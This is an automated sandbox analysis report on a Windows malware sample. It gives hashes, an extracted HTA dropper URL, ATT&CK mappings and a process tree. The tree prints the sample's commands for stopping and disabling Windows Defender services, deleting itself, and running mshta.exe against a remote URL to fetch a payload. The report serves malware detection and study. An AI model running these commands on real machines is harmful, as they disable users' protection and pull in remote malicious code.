04dda7bb206088660114542dc8ca36b2a1b94f3ffc5347289af449f12bcedca9

Analysis

max time kernel
1s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
30-12-2023 00:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

07ea654ba805f82dda0ba70e9014f425.exe
Size

1.7MB
MD5

07ea654ba805f82dda0ba70e9014f425
SHA1

f55a8b8c68ff0dd9ce65826ec36430279ddb13c7
SHA256

04dda7bb206088660114542dc8ca36b2a1b94f3ffc5347289af449f12bcedca9
SHA512

0fb3d6845d47c5a70f7c77f8ff705361a71b4c5b4b94e9721af8788cbaa7b6d3c9212f803b92392659f2946ebdb9e69440e99e0630198ae3e98c70d97e9d5440
SSDEEP

49152:y8OU0+IDBPLyNP6RqiLMWhc9mvtzTI6W3gvS1pjtU2Z/9YD:y890dLyNCsWMWhnztWCS1pjNgD

Score

10^/10

evasion

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://pcprotectionutility.com/favicon.ico?0=72&1=0&2=1&3=57&4=i-s&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000

Signatures

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489
Executes dropped EXE 1 IoCs

Processes:

gryqvc.exe

pid process

3204 gryqvc.exe
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exe

pid process

4884 sc.exe
3080 sc.exe
228 sc.exe
4788 sc.exe
1844 sc.exe
2128 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

pid	process
3204	gryqvc.exe

pid	process
4884	sc.exe
3080	sc.exe
228	sc.exe
4788	sc.exe
1844	sc.exe
2128	sc.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

07ea654ba805f82dda0ba70e9014f425.exenet.exe

description	pid	process	target process
PID 3160 wrote to memory of 2128	3160	07ea654ba805f82dda0ba70e9014f425.exe	sc.exe
PID 3160 wrote to memory of 2128	3160	07ea654ba805f82dda0ba70e9014f425.exe	sc.exe
PID 3160 wrote to memory of 2128	3160	07ea654ba805f82dda0ba70e9014f425.exe	sc.exe
PID 3160 wrote to memory of 1844	3160	07ea654ba805f82dda0ba70e9014f425.exe	sc.exe
PID 3160 wrote to memory of 1844	3160	07ea654ba805f82dda0ba70e9014f425.exe	sc.exe
PID 3160 wrote to memory of 1844	3160	07ea654ba805f82dda0ba70e9014f425.exe	sc.exe
PID 3160 wrote to memory of 2872	3160	07ea654ba805f82dda0ba70e9014f425.exe	net.exe
PID 3160 wrote to memory of 2872	3160	07ea654ba805f82dda0ba70e9014f425.exe	net.exe
PID 3160 wrote to memory of 2872	3160	07ea654ba805f82dda0ba70e9014f425.exe	net.exe
PID 3160 wrote to memory of 4788	3160	07ea654ba805f82dda0ba70e9014f425.exe	sc.exe
PID 3160 wrote to memory of 4788	3160	07ea654ba805f82dda0ba70e9014f425.exe	sc.exe
PID 3160 wrote to memory of 4788	3160	07ea654ba805f82dda0ba70e9014f425.exe	sc.exe
PID 3160 wrote to memory of 3204	3160	07ea654ba805f82dda0ba70e9014f425.exe	gryqvc.exe
PID 3160 wrote to memory of 3204	3160	07ea654ba805f82dda0ba70e9014f425.exe	gryqvc.exe
PID 3160 wrote to memory of 3204	3160	07ea654ba805f82dda0ba70e9014f425.exe	gryqvc.exe
PID 2872 wrote to memory of 1104	2872	net.exe	net1.exe
PID 2872 wrote to memory of 1104	2872	net.exe	net1.exe
PID 2872 wrote to memory of 1104	2872	net.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\07ea654ba805f82dda0ba70e9014f425.exe
"C:\Users\Admin\AppData\Local\Temp\07ea654ba805f82dda0ba70e9014f425.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3160

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\07EA65~1.EXE" >> NUL
2⤵
PID:3940

C:\Users\Admin\AppData\Roaming\Microsoft\gryqvc.exe
C:\Users\Admin\AppData\Roaming\Microsoft\gryqvc.exe
2⤵
- Executes dropped EXE
PID:3204

C:\Windows\SysWOW64\sc.exe
sc config msmpsvc start= disabled
2⤵
- Launches sc.exe
PID:4788

C:\Windows\SysWOW64\net.exe
net stop msmpsvc
2⤵
- Suspicious use of WriteProcessMemory
PID:2872

C:\Windows\SysWOW64\sc.exe
sc config WinDefend start= disabled
2⤵
- Launches sc.exe
PID:1844

C:\Windows\SysWOW64\sc.exe
sc stop WinDefend
2⤵
- Launches sc.exe
PID:2128

C:\Windows\SysWOW64\sc.exe
sc config msmpsvc start= disabled
1⤵
- Launches sc.exe
PID:4884

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msmpsvc
1⤵
PID:4976

C:\Windows\SysWOW64\mshta.exe
mshta.exe "http://pcprotectionutility.com/favicon.ico?0=72&1=0&2=1&3=57&4=i-s&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000"
1⤵
PID:4996

C:\Windows\SysWOW64\net.exe
net stop msmpsvc
1⤵
PID:2356

C:\Windows\SysWOW64\sc.exe
sc config WinDefend start= disabled
1⤵
- Launches sc.exe
PID:3080

C:\Windows\SysWOW64\sc.exe
sc stop WinDefend
1⤵
- Launches sc.exe
PID:228

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msmpsvc
1⤵
PID:1104

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3160-0-0x0000000000400000-0x000000000070C000-memory.dmp

Filesize
3.0MB

Download
memory/3160-2-0x0000000002700000-0x0000000002701000-memory.dmp

Filesize
4KB

Download
memory/3160-11-0x0000000003650000-0x0000000003790000-memory.dmp

Filesize
1.2MB

Download
memory/3160-49-0x0000000003C20000-0x0000000003C21000-memory.dmp

Filesize
4KB

Download
memory/3160-55-0x0000000003D70000-0x0000000003D71000-memory.dmp

Filesize
4KB

Download
memory/3160-54-0x00000000038A0000-0x00000000038A1000-memory.dmp

Filesize
4KB

Download
memory/3160-53-0x0000000003880000-0x0000000003881000-memory.dmp

Filesize
4KB

Download
memory/3160-64-0x0000000003F30000-0x0000000003F31000-memory.dmp

Filesize
4KB

Download
memory/3160-79-0x0000000000400000-0x000000000070C000-memory.dmp

Filesize
3.0MB

Download
memory/3160-67-0x0000000003F40000-0x0000000003F41000-memory.dmp

Filesize
4KB

Download
memory/3160-66-0x0000000003F50000-0x0000000003F51000-memory.dmp

Filesize
4KB

Download
memory/3160-65-0x0000000003F20000-0x0000000003F21000-memory.dmp

Filesize
4KB

Download
memory/3160-63-0x0000000003F00000-0x0000000003F01000-memory.dmp

Filesize
4KB

Download
memory/3160-59-0x0000000003EE0000-0x0000000003EE1000-memory.dmp

Filesize
4KB

Download
memory/3160-62-0x0000000003F10000-0x0000000003F11000-memory.dmp

Filesize
4KB

Download
memory/3160-57-0x0000000003EF0000-0x0000000003EF1000-memory.dmp

Filesize
4KB

Download
memory/3160-52-0x0000000003840000-0x0000000003841000-memory.dmp

Filesize
4KB

Download
memory/3160-51-0x0000000003620000-0x0000000003621000-memory.dmp

Filesize
4KB

Download
memory/3160-50-0x0000000003650000-0x0000000003790000-memory.dmp

Filesize
1.2MB

Download
memory/3160-48-0x0000000003C30000-0x0000000003C31000-memory.dmp

Filesize
4KB

Download
memory/3160-47-0x00000000038C0000-0x00000000038C1000-memory.dmp

Filesize
4KB

Download
memory/3160-46-0x00000000038D0000-0x00000000038D1000-memory.dmp

Filesize
4KB

Download
memory/3160-45-0x0000000003890000-0x0000000003891000-memory.dmp

Filesize
4KB

Download
memory/3160-44-0x0000000003870000-0x0000000003871000-memory.dmp

Filesize
4KB

Download
memory/3160-43-0x0000000003850000-0x0000000003851000-memory.dmp

Filesize
4KB

Download
memory/3160-42-0x0000000003860000-0x0000000003861000-memory.dmp

Filesize
4KB

Download
memory/3160-41-0x0000000003830000-0x0000000003831000-memory.dmp

Filesize
4KB

Download
memory/3160-40-0x0000000003810000-0x0000000003811000-memory.dmp

Filesize
4KB

Download
memory/3160-39-0x0000000003820000-0x0000000003821000-memory.dmp

Filesize
4KB

Download
memory/3160-38-0x00000000037F0000-0x00000000037F1000-memory.dmp

Filesize
4KB

Download
memory/3160-37-0x0000000003800000-0x0000000003801000-memory.dmp

Filesize
4KB

Download
memory/3160-36-0x00000000037D0000-0x00000000037D1000-memory.dmp

Filesize
4KB

Download
memory/3160-35-0x00000000037E0000-0x00000000037E1000-memory.dmp

Filesize
4KB

Download
memory/3160-34-0x00000000037B0000-0x00000000037B1000-memory.dmp

Filesize
4KB

Download
memory/3160-33-0x00000000037C0000-0x00000000037C1000-memory.dmp

Filesize
4KB

Download
memory/3160-32-0x0000000003790000-0x0000000003791000-memory.dmp

Filesize
4KB

Download
memory/3160-31-0x00000000037A0000-0x00000000037A1000-memory.dmp

Filesize
4KB

Download
memory/3160-30-0x0000000003630000-0x0000000003631000-memory.dmp

Filesize
4KB

Download
memory/3160-29-0x0000000003640000-0x0000000003641000-memory.dmp

Filesize
4KB

Download
memory/3160-28-0x0000000003610000-0x0000000003611000-memory.dmp

Filesize
4KB

Download
memory/3160-27-0x00000000035F0000-0x00000000035F1000-memory.dmp

Filesize
4KB

Download
memory/3160-26-0x0000000003600000-0x0000000003601000-memory.dmp

Filesize
4KB

Download
memory/3160-25-0x00000000029A0000-0x00000000029A1000-memory.dmp

Filesize
4KB

Download
memory/3160-24-0x00000000035E0000-0x00000000035E1000-memory.dmp

Filesize
4KB

Download
memory/3160-23-0x0000000002840000-0x0000000002841000-memory.dmp

Filesize
4KB

Download
memory/3160-22-0x00000000028F0000-0x00000000028F1000-memory.dmp

Filesize
4KB

Download
memory/3160-21-0x00000000026D0000-0x00000000026D1000-memory.dmp

Filesize
4KB

Download
memory/3160-20-0x0000000002780000-0x0000000002781000-memory.dmp

Filesize
4KB

Download
memory/3160-19-0x0000000003590000-0x0000000003591000-memory.dmp

Filesize
4KB

Download
memory/3160-18-0x0000000002470000-0x0000000002471000-memory.dmp

Filesize
4KB

Download
memory/3160-17-0x0000000000CB0000-0x0000000000CB1000-memory.dmp

Filesize
4KB

Download
memory/3160-16-0x00000000035D0000-0x00000000035D1000-memory.dmp

Filesize
4KB

Download
memory/3160-15-0x0000000003560000-0x0000000003562000-memory.dmp

Filesize
8KB

Download
memory/3160-14-0x00000000035C0000-0x00000000035C1000-memory.dmp

Filesize
4KB

Download
memory/3160-13-0x0000000003650000-0x0000000003790000-memory.dmp

Filesize
1.2MB

Download
memory/3160-12-0x0000000003650000-0x0000000003790000-memory.dmp

Filesize
1.2MB

Download
memory/3160-10-0x0000000003650000-0x0000000003790000-memory.dmp

Filesize
1.2MB

Download
memory/3160-9-0x0000000003570000-0x0000000003572000-memory.dmp

Filesize
8KB

Download
memory/3160-8-0x0000000003580000-0x0000000003581000-memory.dmp

Filesize
4KB

Download
memory/3160-7-0x0000000002770000-0x0000000002771000-memory.dmp

Filesize
4KB

Download
memory/3160-6-0x0000000002720000-0x0000000002721000-memory.dmp

Filesize
4KB

Download
memory/3160-4-0x00000000026E0000-0x00000000026E1000-memory.dmp

Filesize
4KB

Download
memory/3160-5-0x0000000002750000-0x0000000002751000-memory.dmp

Filesize
4KB

Download
memory/3160-3-0x00000000026F0000-0x00000000026F1000-memory.dmp

Filesize
4KB

Download
memory/3160-1-0x0000000002510000-0x000000000256A000-memory.dmp

Filesize
360KB

Download